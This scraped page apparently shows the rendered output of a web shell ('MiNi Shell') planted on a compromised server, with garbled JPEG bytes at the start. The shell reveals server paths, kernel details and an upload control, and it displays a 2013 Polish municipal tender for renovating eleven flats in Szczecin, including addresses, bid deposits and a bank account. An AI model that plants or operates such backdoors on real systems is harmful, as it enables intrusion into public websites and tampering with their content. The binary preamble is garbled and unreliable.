JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130829/172105-N-2013.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu jedenastu komunalnych lokali mieszkalnych w Szczecinie w podziale na trzy części</b><br>
<b>Numer ogłoszenia: 172105 - 2013; data zamieszczenia: 29.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu jedenastu komunalnych lokali mieszkalnych w Szczecinie w podziale na trzy części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu jedenastu komunalnych lokali mieszkalnych - ul. Nad Odrą 99/3, ul. Wodnej 6/6, ul. Ziemowita 2/6,                ul. Potulickiej 13/5, ul. Cegielskiego 17/29, ul. Krasińskiego 15/1, ul. Niemierzyńskiej 3/3,                              ul. Niemierzyńskiej 28/11, ul. Bohaterów Warszawy 14/19, ul. Mickiewicza 42/1a,                   ul. Wawrzyniaka 7d/10  w podziale na trzy części:

2.	Zakres remontu poszczególnych lokali mieszkalnych:

CZĘŚĆ I
1)	ul. Nad Odrą 99/3  (powierzchnia użytkowa lokalu - 44,65 m2): 
a)	w branży budowlanej - przestawienie pieca licowanego kaflami (1 szt.), naprawa średnia pieca licowanego kaflami (1 szt.), przecieranie istniejących tynków, malowanie ścian i sufitów wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - wyregulowanie kuchenki gazowej 4-ro palnikowej, próba instalacji gazowej, montaż wodomierza, przeczyszczenie syfonu umywalkowego,     
c)	w branży elektrycznej - częściowa wymiana instalacji elektrycznej wraz z osprzętem, wymiana wlz, pomiar rezystancji izolacji instalacji elektrycznej, 

2)	ul. Wodna 6/6  (powierzchnia użytkowa lokalu - 41,12 m2): 
a)	w branży budowlanej - skasowanie wykwitów (zacieków), obsadzenie kratki wentylacyjnej, odgrzybienie murów z cegły,  montaż nawiewników ciśnieniowych, przestawienie pieca licowanego kaflami (1sz), średni remont pieca kaflowego (1szt), obsadzenie kratki wentylacyjnej,  malowanie ścian i sufitów wraz z robotami towarzyszącymi, wywóz gruzu,
b)	w branży sanitarnej - przeczyszczenie syfonu, przeczyszczenie podejścia odpływowego, czyszczenie zlewu jednokomorowego, 
c)	 branży elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem pomiar rezystancji izolacji instalacji elektrycznej, 

3)	ul. Ziemowita 2/6  (powierzchnia lokalu - 9,07 m2):
a)	w branży budowlanej - skasowanie wykwitów (zacieków), obsadzenie kratki wentylacyjnej, malowanie ścian i sufitów, wraz z robotami towarzyszącymi, malowanie farbą olejną stolarki drzwiowej, ścianek i szafek,  wywóz gruzu,
b)	w branży sanitarnej - próba szczelności instalacji c.o., montaż wodomierza, wymiana zlewozmywaka, demontaż termy gazowej, wymiana kuchenki gazowej z piekarnikiem, próba instalacji gazowej,
c)	w branży elektrycznej - wymiana instalacji elektrycznej wraz z  osprzętem, pomiar rezystancji izolacji instalacji elektrycznej,
 
4)	ul. Potulicka 13/5 (powierzchnia użytkowa lokalu - 40,56 m2):  lokal po pożarze 
a)	w branży budowlanej - wymiana stolarki okiennej PCV w pok. 2, wymiana stolarki drzwiowej wewnętrznej, częściowa wymiana tynków, postawienie pieca licowanego kaflami w pok. 2, malowanie ścian i sufitów wraz z robotami towarzyszącymi, wymiana wykładziny PCV, wywiezienie gruzu ,
b)	w branży sanitarnej -  próba instalacji gazowej, 
c)	w branży elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznej,

  CZĘŚĆ II
1)	ul. Cegielskiego 17/29 (powierzchnia użytkowa lokalu - 40,60 m2):
a)	w branży budowlanej - osuszenie lokalu, odgrzybienie stropów ceglanych, przecierka istniejących tynków, malowanie ścian i sufitów wraz z robotami towarzyszącymi, wywiezienie gruzu,
b)	w branży sanitarnej - próba instalacji gazowej,  
c)	w branży elektrycznej - pomiar rezystancji instalacji elektrycznej,

2)	ul. Krasińskiego 15/1 (powierzchnia użytkowa lokalu - 19,89 m2):
a)	w branży budowlanej - obsadzenie kratek wentylacyjnych (2 szt.), wymiana stolarki okiennej drewnianej na PCV z montażem nawiewników, wymianą parapetów wewnętrznych i zewnętrznych, wymiana stolarki drzwiowej wewnętrznej, przetarcie istniejących tynków, malowanie ścian i sufitów wraz z robotami towarzyszącymi, przybicie do podłóg płyt twardych OSB, ułożenie paneli podłogowych, wywóz gruzu,
b)	w branży sanitarnej - wymiana wodomierza, wymiana zlewu blaszanego emaliowanego, wymiana baterii natryskowej, wymiana sedesu z tworzywa sztucznego, 
c)	w branży elektrycznej - montaż kuchenki elektrycznej, montaż szafki drewnianej pod kuchenkę, wymiana osprzętu elektrycznego, pomiar rezystancji instalacji elektrycznej,

3)	ul. Niemierzyńska 3/3  (powierzchnia użytkowa lokalu - 39,30 m2):
a)	w branży budowlanej - obsadzenie kratki wentylacyjnej, likwidacja elektrycznego wentylatora, docieplenie wnęk podokiennych, częściowa wymiana tynków,  malowanie ścian i sufitów wraz z robotami towarzyszącymi, montaż detektora tlenku węgla, przestawienie pieca licowanego kaflami 1 szt., przybicie do podłóg płyt twardych OSB, ułożenie wykładziny PCV, dopasowanie skrzydeł drzwiowych wewnętrznych, zewnętrznych i balkonowych,  wywóz gruzu,
b)	w branży sanitarnej - montaż wodomierza, demontaż baterii umywalkowej i zmywakowej, 
c)	w branży elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji instalacji elektrycznej,

4)	ul. Niemierzyńska 28/11 (powierzchnia użytkowa lokalu - 37,03 m2):
a)	w branży budowlanej - obsadzenie kratki wentylacyjnej,  przestawienie pieca licowanego kaflami, przecieranie istniejących tynków, malowanie ścian i sufitów wraz z robotami towarzyszącymi, montaż detektora tlenku węgla, wymiana stolarki okiennej drewnianej na PCV, wymiana stolarki drzwiowej wewnętrznej oraz drzwi wejściowych, wymiana elementów podłóg z desek, przymocowanie do podłóg płyt OSB, ułożenie wykładziny PCV, wywóz gruzu,
b)	w branży sanitarnej - montaż zlewu blaszanego wraz z syfonem, montaż ustępu z płuczką ustępową, montaż kuchenki gazowej 4-ro palnikowej z piekarnikiem, próba instalacji gazowej, montaż wodomierza,
c)	w branży elektrycznej -  wymiana instalacji elektrycznej wraz z osprzętem, montaż grzejników elektrycznych akumulacyjnych, pomiar rezystancji izolacji instalacji elektrycznej,


CZĘŚĆ III 
1)	ul. Bohaterów Warszawy 14/19  (powierzchnia użytkowa lokalu wynosi - 34,72 m2 ):
a)	 w branży budowlanej - przestawienie pieca licowanego kaflami, odgrzybienie ścian ceglanych, przecieranie istniejących tynków wewnętrznych, obsadzenie kratki wentylacyjnej,  malowanie ścian, sufitów wraz z robotami towarzyszącymi, wymiana istniejącej stolarki okiennej drewnianej na PCV, montaż czujnika czadu, wymiana wykładziny PCV, malowanie stolarki drzwiowej, wywóz gruzu,
b)	w branży sanitarnej - wymiana kuchenki gazowej dwupalnikowej bez piekarnika, próba instalacji gazowej, wymiana wodomierza, wymiana zlewozmywaka, próba szczelności instalacji wodociągowych,
c)	elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,

2)	ul. Mickiewicza 42/1a (powierzchnia użytkowa lokalu wynosi - 36,18 m2 )
a)	w branży budowlanej - odgrzybienie ścian ceglanych, wymiana częściowa tynków wewnętrznych, obsadzenie kratki wentylacyjnej, wymiana istniejącej stolarki okiennej drewnianej na PCV, postawienie (w ścianie) pieca licowanego kaflami, montaż czujnika czadu, malowanie ścian, sufitów, wraz z robotami towarzyszącymi, wymiana wykładziny PCV, dopasowanie skrzydeł drzwiowych wewnętrznych,
b)	w branży sanitarnej -  wymiana kuchenki gazowej dwupalnikowej, próba instalacji gazowej, wymiana zlewozmywaka, wymiana elektrycznego podgrzewacza wody przepływowej, próba szczelności instalacji wodociągowych, 
c)	w branży elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,  

3)	ul. Wawrzyniaka 7d/10 (powierzchnia lokalu wynosi - 16,67 m2 ) 
a)	w branży budowlanej - wykonanie i montaż okna z PCV z zachowaniem istniejącego podziału, wymiana stolarki drzwiowej (drzwi wejściowe), obsadzenie kratek wentylacyjnych szt.2, przecieranie istniejących tynków, malowanie ścian, sufitów wraz z robotami towarzyszącymi, wymiana wykładziny PCV, wywiezienie gruzu,
b)	w branży sanitarnej - demontaż kuchenki gazowej 2-palnikowej, wymiana miski ustępowej porcelanowej z płuczką, wymiana zlewozmywaka, montaż wodomierza, próba szczelności instalacji wodociągowych,  
c)	w branży elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości: 
1)	dla Części I zamówienia (ul. Nad Odrą 99/3, ul. Wodna 6/6, ul. Ziemowita 2/6,                ul. Potulicka 13/5) - 698,00 zł (słownie: sześćset dziewięćdziesiąt osiem złotych),
2)	dla Części II zamówienia (ul. Cegielskiego 17/29, ul. Krasińskiego 15/1,                              ul. Niemierzyńska 3/3, ul. Niemierzyńska 28/11) - 1.128,00 zł (słownie: jeden tysiąc sto dwadzieścia osiem złotych),
3)	dla Części III zamówienia (ul. Bohaterów Warszawy 14/19, ul. Mickiewicza 42/1a,       ul. Wawrzyniaka 7d/10) - 880,00 zł (słownie: osiemset osiemdziesiąt złotych),
     w terminie do dnia  13 września 2013 r. do godz. 1000. Decyduje data wpływu środków do   zamawiającego.
2.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto ZBiLK w ING Bank Śląski O/Szczecin nr 73 1050 0099 6803 0000 0000 0001
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy 
ul. Mariackiej 25, w pokój nr  10  przed upływem terminu składania ofert.
3.	Wadium może być wniesione w jednej lub kilku formach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał  należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie remontu jednego lokalu mieszkalnego we wszystkich branżach. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, 


UWAGA:
Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2010 Nr 243 poz. 1623, ze zmianami) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; 
W przypadku składania oferty wspólnej należy złożyć jeden dokument
2)	odpowiednie pełnomocnictwa;
tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2  siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz)
3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące cześć zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców);
W przypadku składania oferty wspólnej należy złożyć jeden dokument
4)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, 
że wykonawca na 2 dni  przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdego lokalu mieszkalnego, sporządzone zgodnie z zasadami określonymi w Rozdziale X siwz.
 W przypadku składania oferty wspólnej należy złożyć jeden dokument 
5)	oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych.
W przypadku składania oferty wspólnej należy złożyć jeden dokument</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie:
1)	terminu wykonania zamówienia w przypadku wystąpienia nieprzewidzianych robót, których realizacja jest niezbędna do prawidłowego wykonania przedmiotu umowy                   i będzie miała istotny wpływ na przedłużenie terminu zakończenia robót,
2)	osób przewidzianych do realizacji umowy, w szczególnych przypadkach losowych, których wystąpienie uniemożliwi realizację umowy przez te osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych  70-546 Szczecin ul. Mariacka 25 pok. nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2013 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych 70-546 Szczecin ul. Mariacka 25 pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com